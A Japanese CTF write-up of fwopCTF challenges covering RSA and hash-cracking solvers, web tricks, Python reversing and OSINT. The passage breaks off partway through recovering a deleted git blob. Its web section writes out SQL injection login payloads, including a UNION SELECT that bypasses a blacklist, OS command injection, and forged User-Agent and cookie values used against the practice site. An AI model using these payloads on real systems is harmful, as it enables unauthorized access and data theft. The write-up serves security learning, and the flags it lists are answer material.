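enc = bytearray(base64.b64decode('T6ZBVGqFaF9gjkhLXL9Ke125S3tIvUdBR45GTVqOQEVEtHFNWo5eRVy9Uw=='))

p = 824717393
g = 150357959
A = 734947628

b = 845023462
# B is the public value matching b; it is not needed for the decryption below.
B = pow(g, b, p)

# Shared secret: A^b mod p == g^(a*b) mod p.
key = pow(A, b, p)
s_key = bytearray(long_to_bytes(key))

# XOR each ciphertext byte with the key bytes, repeating the key as needed.
flag = bytearray(c ^ s_key[i % len(s_key)] for i, c in enumerate(enc)).decode('ascii')
print(flag)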
fwopCTF{I_found_the_alien_his_name_is_paul}

Pretty Safe Password (Crypto 300)

ブルートフォースでパスワードを求める。

import hashlib

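# Dictionary search for the flag whose MD5 digest is known.
# An unsalted fast hash of a common word is recoverable from a wordlist
# almost instantly, which is why this check falls so quickly.
# The wordlist is read as bytes so hashlib.md5 receives bytes on both
# Python 2 and Python 3.
with open('10k-most-common.txt', 'rb') as f:
    words = f.read().splitlines()

target = '3777de3a24c77814c1e4e27aeb9e40e3'
for word in words:
    password = b'fwopCTF{' + word + b'}'
    if hashlib.md5(password).hexdigest() == target:
        print(password.decode())
        break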
fwopCTF{pa55word}

Home Run (Crypto 350)

CyberChefで以下のレシピで復号する。

・From Base64
・From Base64
・From Base64
・From Binary
・From Hex
・From Base32

f:id:satou-y:20211105211745p:plain

fwopCTF{running_around_the_bases_456789}

Elementary RSA (Crypto 350)

n, qがわかっているので、pを算出できる。あとはそのまま復号する。

from Crypto.Util.number import *

c = 7547565125898378215297051739440246888835869128178814602128398471744328137846645196352789690502829388481328147506940018807183449257834243707849773598414393305253794845257619586242775698697470314118958662932787038546427248055484396055575105135110971290111917998933205130176836472894218594817189395314880103599436146900262227720584244587872516862458558944038921270858082562381938645818571307807059350434544612575270526939881886666213772988313967785602967403463328683642452412570738638011516486964398202827383201545380219462136633609360170379918362441554815623555045825134255750316711554991895782546314094842951837239221
e = 65537
n = 13715280123196571296040497170215424559841118434271081143085393254503221402455218866367322935884205486745414412072737147619005701422821619176312036264040746835557434946118113454705949958288089469537242690516793314691009138099296393081195700382103932212016949324612763350891225015815072676716589951974500241683728451552619937957018532227780090226646421633572025828452979286761778535053778685371789594887586906300906069495398868677875457680655416855327598433514199221642516967512865226196097662282605095102549022089757838743887028753811567234292303888034615388451343532612361239809487469031081253702053913483627342967513
q = 138295817899027125589939386105258578479159740431881274316292285949477631403445673197617716066873262776020799538878278844875145015704122766147923557098420440559040775768532377541317308499486891858654315671171927898037446605115409768580966408482758441823375862061789309173422687582436899562827562898907601960829

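# q must divide n exactly, otherwise the derived p below is meaningless.
assert n % q == 0

# With one prime known, the other is just n / q; the rest is plain RSA decryption.
p = n // q
phi = (p - 1) * (q - 1)
d = inverse(e, phi)
m = pow(c, d, n)
flag = long_to_bytes(m)
# decode() so Python 3 prints the text instead of a b'...' repr
print(flag.decode())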
fwopCT{don't_be_so_clumsy}

フラグの形式を修正する。

fwopCTF{don't_be_so_clumsy}

Ave Maria (Crypto 400)

Trithemius Ave Maria Cipher。https://www.dcode.fr/trithemius-ave-mariaでデコードする。

LEARNYOURLATIN

Kinder RSA (Crypto 400)

RSAのパラメータがそろっているので、そのまま復号する。

from Crypto.Util.number import *

p = 117025919863324186220155912379493510806938956278523335096778026828600895382729413686432125512416987242961255888204400422166767227569280578840187401896714137293001805171341988321852662908122640026581641142465496641866004143100724149516317767459196996302881487013468733667218264219949378827091463411801040433333
e = 65537
c = 3176947916522045759269309860247477806969078544628032431086054916430409561492643390296727934584958799568295039721459221273731800678329151618879869923278910592515839775128584789876977122269445555178438315335177456488472866165828523483080654047393581475909777710523063691395238952705004953255824614927142500947607632610806109942257461826838758244571120945151163127971358262552910600456763503073429250752505495874926777120685874043361508768889445750979867041183999386035611654705651426768594305162794625276466933203875604190503709758422736145157145383125237582611020912918611460533424111536366894528559932701001420239552
n = 10682780633991969177677032196019939027985208229946310919966442519465032181529225488298110788841863113629067354740714072936547257627785850653093685942691560550065001809296374399373377762142325828132422097371522127911728321208614509277335352830189983100178132982012599369846533458595399722731354088854256306846226824731309968110658509633139142049891064431405878186536015671444740708232423766875328640331661803993022425821117080195996399180194864792793387232822578898138983860268605248897408399776140269518083235613918473829364123401722919836036448967473751808918526526887166533489699341809254472381445194313968211679501
d = 8349870118806759862772265655143222556854025841570407203187222760571833826675535585059900898094579214728305769971055714881282836748452480273810581235246886326458027033297324848679391425694502960863074628650323038928823157207551127420106252173985411054925078383258241950659759775646571414573654778240677469493374709546552017058197814263099082949885338486829565261098097424038912450740413892281133896808838467269433631566299466640664843204006072812868977520672537372503857475581013879592069870672135240300086821446969927789617435024923930106366843309026147286983416006068948362159060850750634615509439576603194180447073
q = 91285594221079416032103777163267879510959473929712713487338945167858596955609331062421703786334194408687389318748343117328864181792085064377910816336971021816498260521315839846898184613459752604302179787801085385679518199989894907975205676468500840003987942953430961153503606127238899378811680500145951061497
t = 10682780633991969177677032196019939027985208229946310919966442519465032181529225488298110788841863113629067354740714072936547257627785850653093685942691560550065001809296374399373377762142325828132422097371522127911728321208614509277335352830189983100178132982012599369846533458595399722731354088854256306846018513217225564508406249943596380659573166001197642137951898699448281215894085022126474811032910622341373780614164336656500767770833499149575289014588893739029483794575947420728657552254557876887199414683651891801818601058632300778544925523546053972611657096920266838668977471462066194175542050402021220184672

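# Confirm the supplied parameters are mutually consistent before decrypting:
# n is p*q, t is the totient, and d is the inverse of e modulo t.
assert n == p * q
assert t == (p - 1) * (q - 1)
assert d == inverse(e, t)

# Every parameter is given, so decryption is a single modular exponentiation.
m = pow(c, d, n)
flag = long_to_bytes(m)
# decode() so Python 3 prints the text instead of a b'...' repr
print(flag.decode())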
fwopCTF{oh_no_my_information}

Strange RSA (Crypto 400)

RSA暗号で、n, p, q, e, cが与えられているが、n = p * qとはなっていない。nはp、qのどちらでも割り切れるので、p * qで割ってみると、その商は素数になった。この素数をrとすると、以下のようになるので、あとはそのまま復号する。

n = p * q * r
phi = (p - 1) * (q - 1) * (r - 1)
from Crypto.Util.number import *

n = 7951018409693161668167285098819306759801615467749983772377532762274564323674475529781135819956076874943220398570628206016160240882619874330243093244936395110045993507712409313429053491882557640392921080389040202564944368311332322835084748219968985945494232530915619964225016803746552927248389191728978163526848645974605789560442463273013903681542284658299342143
p = 1929116635275264735053674741049427216734778196597952692885273974756157874848524489523506992386257196915978454424769273897
q = 1903374449504601072452320486035709413287524054085898117310656797189766004182623359564618504846582607657952100194953437513
e = 65537
c = 5966972166891478943697533397002317526062125536151178353483752855912660840768728401988233413928558098251299119103372377488247940263788187179216261221551423070667612264065068718276490178352621443926803409497199336389072678702084464080895190403103597610490385133200289793164066702537822343346786026894342086902097286424450736331498175097265162507503062204219321005

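# Both given primes must divide n for the three-prime reading to make sense.
assert n % p == 0
assert n % q == 0

# The remaining cofactor is the third prime.
r = n // (p * q)
assert isPrime(r)

# Totient of a product of three primes; this form assumes p, q and r are
# pairwise distinct.
phi = (p - 1) * (q - 1) * (r - 1)
d = inverse(e, phi)
m = pow(c, d, n)
flag = long_to_bytes(m)
# decode() so Python 3 prints the text instead of a b'...' repr
print(flag.decode())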
fwopCTF{triple_primes_also_work}

Teenager RSA (Crypto 500)

1文字ずつRSA暗号を行っていると推測できる。またp, q, eは不明だが、20より小さいので"fwopCTF{"で始まることを前提にブルートフォースで復号する。

from Crypto.Util.number import *

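import itertools

# Per-character RSA with tiny, unknown parameters: search p, q, e below 20
# for values that reproduce the known flag prefix, then decrypt every
# character.
enc = [119, 37, 45, 18, 89, 72, 60, 7, 80, 21, 59, 4, 4, 17, 33, 39, 21, 32,
    62, 49, 80, 17, 59, 49, 62, 17, 37, 62, 59, 68, 5]

flag_head = 'fwopCTF{'
head_codes = [ord(ch) for ch in flag_head]

# product() visits (p, q, e) in the same order as three nested loops.
for p, q, e in itertools.product(range(1, 20), repeat=3):
    if all(pow(m, e, p * q) == c for m, c in zip(head_codes, enc)):
        break
else:
    # Without this, a failed search would silently continue with p = q = e = 19.
    raise ValueError('no (p, q, e) below 20 reproduces the known flag prefix')

# %-formatting prints the same text on Python 2 and Python 3.
print('[+] p = %d' % p)
print('[+] q = %d' % q)
print('[+] e = %d' % e)

phi = (p - 1) * (q - 1)
d = inverse(e, phi)

# Each ciphertext value decrypts independently to one character code.
flag = ''.join(chr(pow(c, d, p * q)) for c in enc)
print('[*] flag = %s' % flag)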

実行結果は以下の通り。

[+] p = 11
[+] q = 13
[+] e = 7
[*] flag = fwopCTF{small_numbers_are_weak}
fwopCTF{small_numbers_are_weak}

Thanos RSA (Crypto 500)

eが小さく、平文も短いためm^e < nとなり剰余が効いていないとみて、Low Public-Exponent Attack（cの整数e乗根を取る）で復号する。

from Crypto.Util.number import *
import gmpy

n = 90853943628322295026593682475987617060873593704720419107522455730118510052263265463293746646770270649687914442326502298395536584315638883283598508714600968672217889495196802078585067900709511094279209391102167066735509213687150809291297894333497926049791571469926970525133534853823359619169977902549379766690271029677550623981924039537745336236460806578804468603462430628647190394537926168276717097453855467142322886378913606046349505735904238841871750986024415032881423400763965392179016644748395748894328459546597234450779143514757379951569086179358016591843479108891552906656123595991984678135372139
e = 3
c = 353690381812046953967046705467201123771968703796985157143856239677213620452330219172911759040152594421289421265846324253121362172623915294111963396504119782165935747889254103399163563246766329595499703665701197666661

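# When m**e < n the modular reduction never takes effect, so c is an exact
# e-th power over the integers and its integer root is the message.
# gmpy.root returns (root, exact); the exact flag was previously discarded.
m, exact = gmpy.root(c, e)
# An inexact root means m**e wrapped around n and this shortcut does not
# apply; fail here instead of decoding a truncated root into garbage.
assert exact
flag = long_to_bytes(m)
# decode() so Python 3 prints the text instead of a b'...' repr
print(flag.decode())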
fwopCTF{small_exponent_is_bad}

Super Safe Password (Crypto 500)

ブルートフォースでパスワードを求める。

import hashlib

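import itertools

# Dictionary search over every ordered pair of wordlist entries for the flag
# whose MD5 digest is known. Joining two common words only squares the
# search space, which an unsalted fast hash does not make expensive.
# The wordlist is read as bytes so hashlib.md5 receives bytes on both
# Python 2 and Python 3.
with open('10k-most-common.txt', 'rb') as f:
    words = f.read().splitlines()

target = 'f4552088fd3266916b4fb22757b668cc'
# product() visits (word, word2) in the same order as two nested loops and
# lets a single break end the whole search.
for word, word2 in itertools.product(words, repeat=2):
    password = b'fwopCTF{' + word + word2 + b'}'
    if hashlib.md5(password).hexdigest() == target:
        print(password.decode())
        break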
fwopCTF{cyprusdante1}

In Front Of Your Eyes (Web 100)

HTMLソースを見たら、フラグが見つかった。

fwopCTF{Wolfy_The_Wolf}

Wacky CSS (Web 100)

HTMLソースを見ると、cssがリンクされている。https://web.fweefwop.club/wacky_css.cssにアクセスすると、コメントにフラグが書いてあった。

fwopCTF{Take_my_hand_to_your_fantasy}

Robot Invasion (Web 100)

https://web.fweefwop.club/robots.txtにアクセスすると、こう書いてある。

User-agent: *
Disallow: /
Disallow: /totally_evil_plan

https://web.fweefwop.club/totally_evil_planにアクセスすると、フラグが見つかった。

Step 1: Hire engineers to build a robot army that follows my every command
Step 2: Command those robots to obliterate the engineers because I am broke and cannot afford to pay them
Step 3: ???
Step 4: World Domination
fwopCTF{k1ller_r0bots_wilL_rUl3_th3_W0rld!!1}
fwopCTF{k1ller_r0bots_wilL_rUl3_th3_W0rld!!1}

Marq-weeeeeee! (Web 100)

フラグっぽい文字列がたくさん流れてくるが、フラグ形式としてはおかしいものがほとんど。"fwopCTF{"で検索すると一つだけヒットした。

fwopCTF{t3f0n00}

No Inspector (Web 100)

HTMLソースにjsのリンクがある。https://web.fweefwop.club/boring_script.jsにアクセスすると、こう書いてあった。

console.log("Oh, okay, so it seems like you do actually know your stuff.");
console.log("You can join, but just promise me you won't discuss this with anyone. Don't want my parents finding out.");
console.log("fwopCTF{funky_0n_4_fr1day_n1ght}");
fwopCTF{funky_0n_4_fr1day_n1ght}

Complete me (Web 200)

SQLの条件を記述する際の句を答えればよい。

where

Cookies (Web 250)

CookieのUsernameキーには"user"が設定されている。[Get Cookies!]をクリックすると、「Sorry, only COOKIE MONSTER has cookies!」と表示される。
CookieのUsernameキーに"COOKIE MONSTER"と設定し、[Get Cookies!]をクリックしてみると、フラグが表示された。

fwopCTF{Nom_nom_cookies}

client side login (Web 300)

ユーザ名を入力する画面。HTMLソースを見ると、以下のように書かれている。

        <script>
            function verify()
            {
                // This check runs entirely in the browser, so the accepted
                // name can be read off the three conditions below.
                var entered = document.getElementById("input").value;

                var rightLength = entered.length == 10;
                var rightMiddle = entered.substring(1, 4) == "bef";
                // charCodeAt(8) + 20 == 117 means the character at index 8 has code 97.
                var rightNinth = entered.charCodeAt(8) + 20 == 117;

                if (!(rightLength && rightMiddle && rightNinth)) {
                    alert("nay");
                    return;
                }

                // The revealed value is a fixed slice of the "text" element's
                // markup, i.e. it is already part of the delivered page.
                document.getElementById("flag").innerHTML =
                    document.getElementById("text").innerHTML.substring(1080, 1100);
            }
        </script>

これを満たすユーザ名を指定すれば良さそう。「abefaaaaaa」を入力すると、フラグが表示された。

fwopCTF{SFOVF5TENW}

weird requests huh (Web 400)

PUTメソッドでアクセスしてみる。

$ curl -X PUT https://web.fweefwop.club/requests.php
fwopCTF{what_does_put_even_do??}


<html>
<head>
</head>
<body>
<center><p>i love PUTting people down </p>
<img src="dino.jpg" />
</center>
</body>
</html>
fwopCTF{what_does_put_even_do??}

53Cr37 8r0W53r (Web 400)

HTMLソースを見るとこう書いてある。

Sorry, only our secret agents on our secret browser can access this site.		</p>
<!-- Agent 014, you will need to reinstall the A3SECRET browser again.  We had to wipe your computer because there were government secrets on it. -->

UserAgentに"A3SECRET"を指定してアクセスする。

$ curl -A "A3SECRET" https://web.fweefwop.club/agent.php
<!DOCTYPE html>
<html>
	<head>
		<meta charset="utf-8">
		<meta name="viewport" content="width=device-width, initial-scale=1">		

		<title>secret agent landing page</title>
		<link href="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-1BmE4kWBq78iYhFldvKuhfTAU6auU8tT94WrHftjDbrCEXSU1oBoqyl2QvZ6jIW3" crossorigin="anonymous">
		<link rel="stylesheet" href="agent.css"/>
		
	</head>

	<body class="p-2 mb-1 text-white ">
		<h1 class="text-center">Secret Agent Landing Page</h1>
		<br />
		<p class="text-center">
		fwopCTF{secret_browser_007}		</p>
		<!-- Agent 014, you will need to reinstall the A3SECRET browser again.  We had to wipe your computer because there were government secrets on it. -->
		
	</body>
</html>
fwopCTF{secret_browser_007}

KevinSay (Web 400)

OSコマンドインジェクションを行う。

■`ls`を入力
flag193290.txt

■`cat flag193290.txt`を入力
fwopCTF{C0MM4ND1NDJ3C710N11}
fwopCTF{C0MM4ND1NDJ3C710N11}

SQLI (Web 500)

以下でログインすると、フラグが表示された。

Username: ' or 1=1 #
Password: a
fwopCTF{Leaked_data_123}

SQLI But Filtered? (Web 600)

http://web.fweefwop.club:8402/robots.txtにアクセスすると、こう書いてある。

User-agent: *
Disallow: /filter.php

http://web.fweefwop.club:8402/filter.phpにアクセスする。
Filters: -- # /* OR AND NOT NULL
|

上記がブラックリストになっている。UNIONやSELECTはフィルタ対象に含まれておらず、禁止語の列挙では防ぎきれていない。以下でログインしてみると、フラグが表示された。

Username: a
Password: ' union select 1, 'admin', 'pass
fwopCTF{f1lt3rs_not_good_3n0ugh}

Reversing Python 1 (Reverse 100)

Pythonコードが添付されている。そのままフラグ文字列と比較している。

fwopCTF{no_python_required}

Reversing Python 2 (Reverse 150)

Pythonコードが添付されている。var4のフラグ文字列と比較している。

fwopCTF{perhaps_this_is_the_flag}

Reversing Python 3 (Reverse 175)

Pythonコードが添付されている。var3のフラグ文字列と比較している。var3に複数回別の文字列が設定されているので、最後に設定された文字列がフラグになる。

fwopCTF{see_seesaw_sheshore_see_sheshore_seasells_shells}

Reversing Python 3 Bonus (Reverse 250)

Pythonコードが添付されている。kaq8hとnw91の値を結合し、fwopCTF{}で囲ったものがフラグ。上にさかのぼって変数を検索する。

kaq8h = "a505d061c2baf118fce231d8bfc7c1cb"
nw91 = "ad34ccf7f2ed2c4b8b8c675c235fd744"
fwopCTF{a505d061c2baf118fce231d8bfc7c1cbad34ccf7f2ed2c4b8b8c675c235fd744}

Reversing Python 4 (Reverse 250)

Pythonコードが添付されている。判定直前にcorrectflagを出力させる。

#!/usr/bin/env python3

# Straight-line puzzle: three integers are pushed through a fixed series of
# branches and the last assignment to correctflag is printed. The comments
# trace the values for the starting numbers below.
var1 = 15
var2 = 4
var3 = 9

# 15 < 9 is False; 9 > 4 is True, so the elif branch runs.
if var1 < var3:
    var2 = var1 + var3
elif var3 > var2:
    var1 = (var1 * var2) - var2  # var1 = 15*4 - 4 = 56
else:
    var3 = var2 * var1

# 56 - 4*9 = 20 >= 10, so the first branch runs.
if var1 - var2 * var3 >= 10:
    var1 = 15 - var3  # var1 = 6
    var3 = var1 * var2  # var3 = 24
else:   
    # not reached with these starting values
    var2 = var1 / var2
    var3 = var3 * 2


# 6 + 4 = 10 > 24 is False, so none of these three candidates is assigned.
if var1 + var2 > var3:
    if var2 + 2 != var1:
        correctflag = "fwopCTF{else_elif_if_elif_else_else}"
    elif var3 - var1 >= var2 * var2:
        correctflag = "fwopCTF{else_if_then_then_else_elif}"
    elif var3 + var1 + var2 <= var3 + var1 * var2:
        correctflag = "fwopCTF{then_else_else_then_if_if}"

var3 = (var3 * -1) + var1 + var2  # var3 = -24 + 6 + 4 = -14

# -14 + 4 + 12 = 2 >= 0, so this block decides the flag.
if var3 + var2 + var1 * 2 >= 0:
    if var3 == var2 * -2:  # -14 == -8 is False
        correctflag = "fwopCTF{else_then_if_then_elif_elif}"
    elif var2 * var1 - var3 == 3 * var1 + 5 * var2:  # 24 + 14 == 18 + 20, True
        correctflag = "fwopCTF{then_if_then_else_if_if}"
    else:
        correctflag = "fwopCTF{elif_if_if_then_elif_elif}"
        
# correctflag is only bound if one of the branches above assigned it.
print(correctflag)
fwopCTF{then_if_then_else_if_if}

Reversing Python 5 (Reverse 275)

Pythonコードが添付されている。判定直前にcorrectflagを出力させる。

#!/usr/bin/env python3

# The flag body is built by re-slicing the string twice; each step works on
# the result of the previous one.
correctflag = "deoxyribonucleic_acid"

# Step 1: first four characters, characters 7..15, then characters 5, 4, 3
# (a reversed slice).
head = correctflag[:4]
middle = correctflag[7:16]
backwards = correctflag[5:2:-1]
correctflag = "".join((head, middle, backwards))

# Step 2: drop four characters from each end, append characters 12..(last-1),
# then every second character walking backwards from the end (index 0 excluded).
inner = correctflag[4:-4]
tail = correctflag[12:-1]
every_other_reversed = correctflag[-1:0:-2]
correctflag = inner + tail + every_other_reversed
print(correctflag)
bonucleicryxriluoxe
fwopCTF{bonucleicryxriluoxe}

Reversing Python 6 (Reverse 300)

Pythonコードが添付されている。判定直前にcorrectflagを出力させる。

#!/usr/bin/env python3

# Substitution table: each number in `code` is an index into `alphabet`.
alphabet = "abcdefghijklmnopqrstuvwxyz{}_ABCDEFGHIJKLMNOPQRSTUVWXYZ"
code = [5, 22, 14, 15, 31, 48, 34, 26, 0, 11, 18, 14, 28, 2, 17, 24, 15, 19, 14, 28, 11, 14, 11, 27]

# Look every index up in order and join the characters into the flag.
correctflag = "".join(alphabet[index] for index in code)
print(correctflag)
fwopCTF{also_crypto_lol}

Reversing Python 7 (Reverse 350)

スクリプトの処理概要は以下の通り。

・フラグの長さは20であるかをチェック
・フラグの後半8バイトと前半12バイトを入れ替え
・semicolonpos: ;のインデックス
・enteredFlag = enteredFlag[0:semicolonpos] + "o_dddduel}"
・enteredFlag == "fwopCTF{its_time_to_dddduel}"であるかをチェック

入れ替えをして、qが入っている必要があることを考慮する。

its_time_t;qfwopCTF{

Fwop Door (Reverse 500)

Pythonコードが添付されている。フラグの各文字について条件がたくさんあるので、z3で解く。

from z3 import *

# Python 2 script (print statement). Each flag character is modelled as an
# unbounded z3 Int; the constraints below fix the sums of character triples.

# (i, j, k, total) means: n[i] + n[j] + n[k] == total
TRIPLE_SUMS = [
    (9, 32, 26, 337),
    (47, 14, 58, 329),
    (56, 32, 19, 316),
    (32, 6, 51, 304),
    (43, 14, 44, 318),
    (55, 2, 50, 313),
    (36, 50, 35, 311),
    (52, 42, 55, 311),
    (44, 9, 22, 335),
    (57, 27, 32, 344),
    (8, 33, 16, 322),
    (38, 6, 26, 273),
    (53, 27, 2, 327),
    (15, 35, 32, 328),
    (17, 15, 21, 308),
    (28, 52, 22, 326),
    (12, 53, 48, 317),
    (34, 50, 6, 279),
    (22, 32, 47, 347),
    (30, 32, 38, 333),
    (48, 7, 59, 359),
    (40, 15, 31, 299),
    (20, 30, 15, 304),
    (19, 7, 13, 321),
    (54, 36, 56, 306),
    (37, 10, 5, 284),
    (0, 4, 6, 239),
    (41, 52, 11, 315),
    (18, 42, 10, 315),
    (3, 55, 34, 333),
    (27, 45, 43, 338),
    (25, 51, 39, 321),
    (16, 35, 4, 290),
    (4, 28, 59, 306),
    (5, 44, 31, 295),
    (6, 56, 58, 276),
    (14, 22, 25, 300),
    (51, 4, 36, 284),
    (2, 38, 5, 296),
    (11, 40, 49, 336),
    (35, 38, 31, 317),
    (23, 34, 5, 295),
    (1, 5, 52, 307),
    (46, 26, 33, 298),
    (13, 1, 23, 311),
    (49, 36, 50, 313),
    (39, 25, 16, 313),
    (58, 36, 18, 322),
    (31, 7, 28, 338),
    (21, 35, 45, 333),
    (24, 46, 33, 299),
    (29, 15, 0, 292),
    (26, 5, 23, 283),
    (10, 52, 39, 319),
    (7, 12, 44, 334),
    (50, 27, 29, 301),
    (33, 22, 43, 320),
    (45, 49, 10, 338),
    (42, 58, 57, 326),
    (59, 10, 12, 331),
]

n = [Int('n[%d]' % idx) for idx in range(60)]
solver = Solver()

for first, second, third, total in TRIPLE_SUMS:
    solver.add(n[first] + n[second] + n[third] == total)
# The only single-character constraint: position 18 is code point 110.
solver.add(n[18] == 110)

# Nothing is printed when the solver does not report sat.
if solver.check() == sat:
    model = solver.model()
    flag = ''.join(chr(model[var].as_long()) for var in n)
    print flag
fwopCTF{quite_a_long_flag_for_reverse_eng_dont_you_think_so}

Reversing Python 8 (Reverse 500)

スクリプトでは、フラグの長さが27であるかをチェックし、ある法則でシャッフルしている。法則を整理するのが面倒なので、異なる文字27文字をシャッフルさせ、その結果から元に戻すようにする。

#!/usr/bin/env python3
import string

# Probe input: 27 distinct characters, so every output position of the
# shuffle can be traced back to exactly one input position.
enteredFlag = string.ascii_lowercase + '0'

# Lay the probe out as a 3x3x3 cube, three characters per innermost row.
coolarray = [
    [[enteredFlag[9 * plane + 3 * row + col] for col in range(3)] for row in range(3)]
    for plane in range(3)
]

# Replay the shuffle: planes in order 2, 0, 1; rows of each plane reversed;
# characters of each row rotated to positions 1, 2, 0.
newflag = "".join(
    cells[pos]
    for layer in (coolarray[2], coolarray[0], coolarray[1])
    for cells in reversed(layer)
    for pos in (1, 2, 0)
)

enc = "s}ginh_td{aFCTpwofolhs_yrar"

# Undo the shuffle: the character that started at position i ended up where
# the i-th probe character now sits in newflag.
flag = "".join(enc[newflag.index(probe)] for probe in enteredFlag[:len(enc)])
print(flag)
fwopCTF{arrays_hold_things}

A street named what? (OSINT 100)

写真にあるAppleのロゴのところに記載されている場所の名前は「Apple Park Visitor Center」その前の通りの名前を答える。

fwopCTF{Pruneridge}

Where is everybody? (OSINT 100)

「deserted 2027」で検索すると、https://www.dailymail.co.uk/femail/article-9418269/Man-claims-woken-year-2027-gone-viral-TikTok.htmlなどのページが見つかる。
Javierという名前のTikTokユーザーがスペインのバレンシアの人けのない通りのビデオを共有したという記事が書かれている。

Valencia

The Rock (OSINT 200)

"The Rock"の映画を調べると、アルカトラズ島を占拠したアメリカ海兵隊の英雄率いるテロリストと、制圧する特殊部隊との攻防を描いた作品とのこと。念のために、アルカトラズ島を調べると、以下の位置で写真と似たような景色が見えた。

https://www.google.co.jp/maps/@37.8256032,-122.422231,2a,75y,355.28h,95.7t,360r/data=!3m6!1e1!3m4!1sq2Sui4ey80V-GY6I_Gp6sg!2e0!7i13312!8i6656?hl=ja
fwopCTF{Alcatraz}

Location Location (OSINT 200)

問題には緯度、経度の計算結果らしきものがある。

>>> a = 10.9219612
>>> b = -19.712993
>>> x = (a + b) / 2
>>> y = (a - b) / 2
>>> x
-4.3955159
>>> y
15.317477100000001

xが緯度、yが経度として、調べる。

https://www.google.co.jp/maps/place/4%C2%B023'43.9%22S+15%C2%B019'02.9%22E/@-4.3955105,15.3152884,17z/data=!3m1!4b1!4m5!3m4!1s0x0:0x0!8m2!3d-4.3955159!4d15.3174771?hl=ja
Kinshasa

Kevin Gaming (OSINT 200)

このKevinさんが誰のことなのか、Twitterのツイートをヒントに探してみたが、わからない。適当にゲーム機の名前を入れたら、通った。

fwopCTF{PlayStation_2}

Lighthouse (OSINT 250)

画像検索すると、https://no.pinterest.com/pin/618963542506418652/などが見つかる。

Point Pinos Lighthouse in Pacific Grove, California, United States
Pacific Grove

Kevin Took The Flag (OSINT 250)

Internet Archiveで見てみると、202/7/3に2回スナップショットが取られている。17:42:10のものを見てみると、フラグが書いてあった。
f:id:satou-y:20211105232607p:plain

fwopCTF{wayback_machine_doesn't_let_me_play_club_penguin_again_D:}

Bitcoin Laundering (2) (OSINT 250)

https://www.blockchain.com/btc/address/16ftSEQ4ctQFDtVZiUBusQUjRrGhM3JYweを調べる。
f:id:satou-y:20211105232708p:plain
該当の日時に3M219KR5vEneNb47ewrPfWyb5jQ2DjxRP6のアドレスが見つかる。
https://www.blockchain.com/btc/address/3M219KR5vEneNb47ewrPfWyb5jQ2DjxRP6を調べる。
該当期間で3M219KR5vEneNb47ewrPfWyb5jQ2DjxRP6宛のBTCで最大のものを探す。
f:id:satou-y:20211105232742p:plain

30888

Kevin's secret (OSINT 275)

$ git clone https://github.com/fweefwopkevin/country-flags
Cloning into 'country-flags'...
remote: Enumerating objects: 5368, done.
remote: Counting objects: 100% (753/753), done.
remote: Compressing objects: 100% (432/432), done.
remote: Total 5368 (delta 333), reused 663 (delta 321), pack-reused 4615
Receiving objects: 100% (5368/5368), 30.67 MiB | 8.04 MiB/s, done.
Resolving deltas: 100% (1295/1295), done.
Checking out files: 100% (1027/1027), done.
$ cd country-flags/.git
$ git log --all
commit 24b6c22afd7a18fe2a8343c8a94b364558946f1d (HEAD -> main, origin/main, origin/HEAD)
Author: fweefwopkevin <92276932+fweefwopkevin@users.noreply.github.com>
Date:   Sat Oct 16 20:07:42 2021 -0700

    Flag was redacted

commit 7c568d775c7363e9f86681452a5f85bcb4a12f10
Author: fweefwopkevin <92276932+fweefwopkevin@users.noreply.github.com>
Date:   Sat Oct 16 20:06:41 2021 -0700

    Create flag.txt

commit 6c887625a427c760099d993d56894be274d30b4f
Author: Wyatt O'Day <wyatt@wyday.com>
Date:   Fri Sep 24 13:20:18 2021 -0400

    Reduce flag of India size. Visually unchanged.

commit ec8815a9ead98e2f86cc871b8493b9c99f7e5c0c
Merge: 5746d5a 02289f2
Author: Wyatt OʼDay <wyatt@wyday.com>
Date:   Fri Sep 24 11:56:08 2021 -0400

    Merge pull request #123 from ronak69/main
    
    Update Flag of India

$ ls -lR objects/
objects/:
合計 0
drwxrwxrwx 1 root root 0 10月 25 11:02 info
drwxrwxrwx 1 root root 0 10月 25 11:02 pack

objects/info:
合計 0

objects/pack:
合計 31556
-r-xr-xr-x 1 root root   151376 10月 25 11:02 pack-db658f291b3914a22a01f2ae1e4bee8b074d2e79.idx
-r-xr-xr-x 1 root root 32161291 10月 25 12:09 pack-db658f291b3914a22a01f2ae1e4bee8b074d2e79.pack

objectsディレクトリにはオブジェクト本体(loose object)がなく、packファイルだけがあるので、新しくリポジトリを作ってそこで展開する。git unpack-objectsは展開先のリポジトリに既に存在するオブジェクトを展開しないため、別のリポジトリで実行する必要がある。

$ cd ../..
$ git init newrepo
Initialized empty Git repository in /XXX/XXX/XXX/newrepo/.git/
$ cp -p ../country-flags/.git/objects/pack/pack-db658f291b3914a22a01f2ae1e4bee8b074d2e79.pack .
$ git unpack-objects < pack-db658f291b3914a22a01f2ae1e4bee8b074d2e79.pack
Unpacking objects: 100% (5368/5368), done.
$ cd newrepo/.git

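「Create flag.txt」のコミット(7c568d77…)から、commit → tree → flag.txtのblobの順にオブジェクトを辿っていく。後のコミットでフラグを消しても、元のblobは履歴に残っているので取り出せる。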

$ python -c 'import zlib; print zlib.decompress(open("objects/7c/568d775c7363e9f86681452a5f85bcb4a12f10").read())'
commit 726tree 395463cf3af3f316a11517c3ccf04096b33801ee
parent 6c887625a427c760099d993d56894be274d30b4f
author fweefwopkevin <92276932+fweefwopkevin@users.noreply.github.com> 1634440001 -0700
committer GitHub <noreply@github.com> 1634440001 -0700
gpgsig -----BEGIN PGP SIGNATURE-----
 
 wsBcBAABCAAQBQJha5NBCRBK7hj4Ov3rIwAAOj8IADPlfgN5Z5NjiDR98WzLYY6t
 N5FMXs8VmlixgGQM6zc2Cy2fYDk9AaSi5FjmrCKQf/whXa20uH+JeAPFJAUfy0BU
 G9seDitWl+z7rkKRVFQ6Woo7g7/1yeJR6I+aakwUKztdghpK5SKPd6IijPoMssDl
 IQUs1dpuOqReyjqcorfKv6ocWQZISnO9FQd7nO7byhe7hpVJprLgayi439A4Z6sd
 /ig7eLrKb680YsggYpumntFeBR+JlJ/XH9kgr4KIZfQgzAUzIstzjZkX+gFJzz2k
 e073qA/FESn1NulL7Tuwr8IvKJbLrCtVkuT1ibnhTsx/X7VUwYzvDJEo1HoD2Wc=
 =Ev3Z
 -----END PGP SIGNATURE-----
 

Create flag.txt

$ python -c 'import zlib; print zlib.decompress(open("objects/39/5463cf3af3f316a11517c3ccf04096b33801ee").read())' | xxd -g 1
